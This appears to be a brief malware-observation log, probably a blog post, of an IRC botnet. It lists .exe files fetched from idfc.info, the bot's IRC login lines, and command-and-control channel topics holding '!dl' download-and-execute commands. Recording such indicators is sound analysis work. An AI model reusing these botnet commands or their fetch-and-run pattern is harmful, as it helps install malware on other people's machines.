Remote Host Port Number 80 1289

* The data identified by the following URLs was then requested from the remote web server:
o http://idfc.info/nadnad.exe
o http://idfc.info/jiri.exe

NICK pshnsuh
USER urlytdp “” “ngs” :urlytdp
PRIVMSG #xddc3 :Failed.

Now talking in ##xddc
Topic On: [ ##xddc ] [ !dl http://idfc.info/so8.exe p3xddy.exe 1 ]
Topic By: [ always ]
Modes On: [ ##xddc ] [ +smntSMCu ]

Now talking in #xddc2
Topic On: [ #xddc2 ] [ !dl http://idfc.info/nadnad.exe nanad.exe 1 ]
Topic By: [ always ]
Modes On: [ #xddc2 ] [ +smntSMCu ]

Now talking in #xddc3
Topic On: [ #xddc3 ] [ !dl http://idfc.info/jiri.exe jiri.exe 1 ]
Topic By: [ always ]
Modes On: [ #xddc3 ] [ +smntSMCu ]

Categories: Uncategorized
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